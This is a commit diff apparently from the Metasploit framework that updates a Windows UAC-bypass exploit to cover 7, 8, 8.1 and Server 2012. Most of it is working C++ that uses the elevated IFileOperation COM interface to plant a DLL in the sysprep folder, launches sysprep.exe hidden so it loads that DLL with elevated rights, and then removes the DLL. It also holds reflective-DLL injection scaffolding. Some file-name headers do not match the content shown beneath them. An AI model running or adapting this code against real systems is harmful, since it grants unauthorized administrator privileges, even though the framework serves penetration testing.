Land rapid7#4553 - Update bypass UAC to work on 7, 8, 8.1, and 2012

Author: wchen-r7

data/post/bypassuac-x64.dll

@@ -93,7 +93,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
@@ -132,7 +132,7 @@
       <Optimization>MaxSpeed</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
       <FunctionLevelLinking>true</FunctionLevelLinking>
       <PrecompiledHeader />
@@ -190,13 +190,13 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
   </ItemDefinitionGroup>
   <ItemGroup>
     <ClCompile Include="src\Exploit.cpp" />
-    <ClCompile Include="src\ReflectiveDll.c" />
     <ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
+    <ClCompile Include="src\ReflectiveDll.c" />
   </ItemGroup>
   <ItemGroup>
-    <ClInclude Include="src\Exploit.h" />
     <ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
     <ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
+    <ClInclude Include="src\Exploit.h" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">

data/post/bypassuac-x86.dll

@@ -1,119 +1,158 @@
+#include "ReflectiveLoader.h"
 #include "Exploit.h"
 
-void exploit()
-{
-
-	const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
-	const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
-	const wchar_t *sySysPrepExe = L"sysprep.exe";
-	const wchar_t *szElevDll = L"CRYPTBASE.dll";
-	const wchar_t *szSourceDll = L"CRYPTBASE.dll";
-	wchar_t szElevDir[MAX_PATH] = {};
-	wchar_t szElevDir_syswow64[MAX_PATH] = {};
-	wchar_t szElevDllFull[MAX_PATH] = {};
-	wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
-	wchar_t szElevExeFull[MAX_PATH] = {};
-	wchar_t path[MAX_PATH] = {};
-	wchar_t windir[MAX_PATH] = {};
-	const wchar_t *szElevArgs = L"";
-	const wchar_t  *szEIFOMoniker = NULL;
-	PVOID OldValue = NULL;
-
-	IFileOperation *pFileOp = NULL;
-	IShellItem *pSHISource = 0;
-	IShellItem *pSHIDestination = 0;
-	IShellItem *pSHIDelete = 0;
-
-	const IID *pIID_EIFO = &__uuidof(IFileOperation);
-	const IID *pIID_EIFOClass = &__uuidof(FileOperation);
-	const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
-
-	GetWindowsDirectoryW(windir, MAX_PATH);
-	GetTempPathW(MAX_PATH, path);
-
-	/* %temp%\cryptbase.dll */
-	wcscat_s(path, MAX_PATH, szSourceDll);
-	
-	/* %windir%\System32\sysprep\ */
-	wcscat_s(szElevDir, MAX_PATH, windir);
-	wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
-
-	/* %windir%\sysnative\sysprep\ */
-	wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
-	wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
-
-	/* %windir\system32\sysprep\cryptbase.dll */
-	wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
-	wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
-
-	/* %windir\sysnative\sysprep\cryptbase.dll */
-	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
-	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
-
-	/* %windir%\system32\sysprep\sysprep.exe */
-	wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
-	wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
-
-	if (CoInitialize(NULL) == S_OK)
-	{	
-		if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
+#define SAFERELEASE(x) if(NULL != x){x->Release(); x = NULL;}
+
+extern "C" {
+
+	void exploit(BypassUacPaths const * const paths)
+	{
+		const wchar_t *szElevArgs = L"";
+		const wchar_t *szEIFOMoniker = NULL;
+
+		PVOID OldValue = NULL;
+
+		IFileOperation *pFileOp = NULL;
+		IShellItem *pSHISource = 0;
+		IShellItem *pSHIDestination = 0;
+		IShellItem *pSHIDelete = 0;
+
+		BOOL bComInitialised = FALSE;
+
+		const IID *pIID_EIFO = &__uuidof(IFileOperation);
+		const IID *pIID_EIFOClass = &__uuidof(FileOperation);
+		const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
+
+		dprintf("[BYPASSUACINJ] szElevDir          = %S", paths->szElevDir);
+		dprintf("[BYPASSUACINJ] szElevDirSysWow64  = %S", paths->szElevDirSysWow64);
+		dprintf("[BYPASSUACINJ] szElevDll          = %S", paths->szElevDll);
+		dprintf("[BYPASSUACINJ] szElevDllFull      = %S", paths->szElevDllFull);
+		dprintf("[BYPASSUACINJ] szElevExeFull      = %S", paths->szElevExeFull);
+		dprintf("[BYPASSUACINJ] szDllTempPath      = %S", paths->szDllTempPath);
+
+		do
 		{
-			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
+			if (CoInitialize(NULL) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Failed to initialize COM");
+				break;
+			}
+
+			bComInitialised = TRUE;
+
+			if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**)&pFileOp) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Couldn't create EIFO instance");
+				break;
+			}
+
+			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
+				break;
+			}
+
+			if (SHCreateItemFromParsingName((PCWSTR)paths->szDllTempPath, NULL, *pIID_ShellItem2, (void**)&pSHISource) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to create item from name (source)");
+				break;
+			}
+
+			if (SHCreateItemFromParsingName(paths->szElevDir, NULL, *pIID_ShellItem2, (void**)&pSHIDestination) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to create item from name (destination)");
+				break;
+			}
+
+			if (pFileOp->CopyItem(pSHISource, pSHIDestination, paths->szElevDll, NULL) != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to prepare copy op for elev dll");
+				break;
+			}
+
+			/* Copy the DLL file to the target folder*/
+			if (pFileOp->PerformOperations() != S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Unable to copy elev dll");
+				break;
+			}
+
+			/* Execute the target binary */
+			SHELLEXECUTEINFOW shinfo;
+			ZeroMemory(&shinfo, sizeof(shinfo));
+			shinfo.cbSize = sizeof(shinfo);
+			shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+			shinfo.lpFile = paths->szElevExeFull;
+			shinfo.lpParameters = szElevArgs;
+			shinfo.lpDirectory = paths->szElevDir;
+			shinfo.nShow = SW_HIDE;
+
+			Wow64DisableWow64FsRedirection(&OldValue);
+			if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
+			{
+				WaitForSingleObject(shinfo.hProcess, 10000);
+				CloseHandle(shinfo.hProcess);
+			}
+
+			if (S_OK != SHCreateItemFromParsingName(paths->szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
+				|| NULL == pSHIDelete)
+			{
+				dprintf("[BYPASSUACINJ] Failed to create item from parsing name (delete)");
+				break;
+			}
+
+			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
 			{
-				if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
-				{
-					if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
-					{
-						if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
-						{
-							/* Copy the DLL file to the sysprep folder*/
-							if (pFileOp->PerformOperations() == S_OK)
-							{
-								/* Execute sysprep.exe */
-								SHELLEXECUTEINFOW shinfo;
-								ZeroMemory(&shinfo, sizeof(shinfo));
-								shinfo.cbSize = sizeof(shinfo);
-								shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
-								shinfo.lpFile = szElevExeFull;
-								shinfo.lpParameters = szElevArgs;
-								shinfo.lpDirectory = szElevDir;
-								shinfo.nShow = SW_HIDE;
-
-								Wow64DisableWow64FsRedirection(&OldValue);
-								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
-								{
-									WaitForSingleObject(shinfo.hProcess, 10000);
-									CloseHandle(shinfo.hProcess);
-								}
-
-								if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
-								{
-									if (0 != pSHIDelete)
-									{
-										if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
-										{
-                      pFileOp->PerformOperations();
-											// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
-											// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
-											// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
-											if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
-											{
-												if (0 != pSHIDelete)
-												{
-													if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
-													{
-														pFileOp->PerformOperations();
-													}
-												}
-											}
-										}
-									}
-								}
-							}
-						}
-					}
-				}
+				dprintf("[BYPASSUACINJ] Failed to prepare op for delete");
+				break;
 			}
+
+			if (pFileOp->PerformOperations() == S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Successfully deleted dll");
+
+				// bail out this point because we don't need to keep trying to delete
+				break;
+			}
+
+			SAFERELEASE(pSHIDelete);
+
+			// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
+			// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
+			// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
+			if (S_OK != SHCreateItemFromParsingName(paths->szElevDirSysWow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
+				|| NULL == pSHIDelete)
+			{
+				dprintf("[BYPASSUACINJ] Failed to create item from parsing name for delete (shellitem2)");
+				break;
+			}
+
+			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
+			{
+				dprintf("[BYPASSUACINJ] Failed to prepare op for delete (shellitem2)");
+				break;
+			}
+
+			if (pFileOp->PerformOperations() == S_OK)
+			{
+				dprintf("[BYPASSUACINJ] Successfully deleted DLL in target directory from SYSWOW64 process");
+			}
+			else
+			{
+				dprintf("[BYPASSUACINJ] Failed to delete target DLL");
+			}
+
+		} while (0);
+
+		SAFERELEASE(pSHIDelete);
+		SAFERELEASE(pSHIDestination);
+		SAFERELEASE(pSHISource);
+		SAFERELEASE(pFileOp);
+
+		if (bComInitialised)
+		{
+			CoUninitialize();
 		}
 	}
-}
+
+}

external/source/exploits/bypassuac_injection/dll/reflective_dll.vcxproj

@@ -5,4 +5,32 @@
 #include <stdio.h>
 #include <guiddef.h>
 
-EXTERN_C void exploit();
+// Uncomment this line to include debug output
+//#define DEBUGTRACE
+
+#ifdef DEBUGTRACE
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+static void real_dprintf(char *format, ...)
+{
+	va_list args;
+	char buffer[1024];
+	va_start(args, format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format, args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
+#else
+#define dprintf(...)
+#endif
+
+typedef struct _BypassUacPaths
+{
+	wchar_t szElevDir[MAX_PATH];
+	wchar_t szElevDirSysWow64[MAX_PATH];
+	wchar_t szElevDll[MAX_PATH];
+	wchar_t szElevDllFull[MAX_PATH];
+	wchar_t szElevExeFull[MAX_PATH];
+	wchar_t szDllTempPath[MAX_PATH];
+} BypassUacPaths;
+
+EXTERN_C void exploit(BypassUacPaths const * const paths);

external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp

@@ -5,22 +5,29 @@ extern HINSTANCE hAppInstance;
 
 BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
 {
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			exploit();
-			ExitProcess(0);
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+		{
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+
+		if (NULL != lpReserved)
+		{
+			dprintf("[BYPASSUACINJ] Launching exploit with 0x%p", lpReserved);
+			exploit((BypassUacPaths*)lpReserved);
+		}
+
+		ExitProcess(0);
+		break;
+	default:
+		break;
+	}
+
+	return TRUE;
+
 }

external/source/exploits/bypassuac_injection/dll/src/Exploit.h

@@ -90,7 +90,7 @@ def is_uac_enabled?
     uac = false
     winversion = session.sys.config.sysinfo['OS']
 
-    if winversion =~ /Windows (Vista|7|8|2008)/
+    if winversion =~ /Windows (Vista|7|8|2008|2012)/
       unless is_system?
         begin
           enable_lua = registry_getvaldata(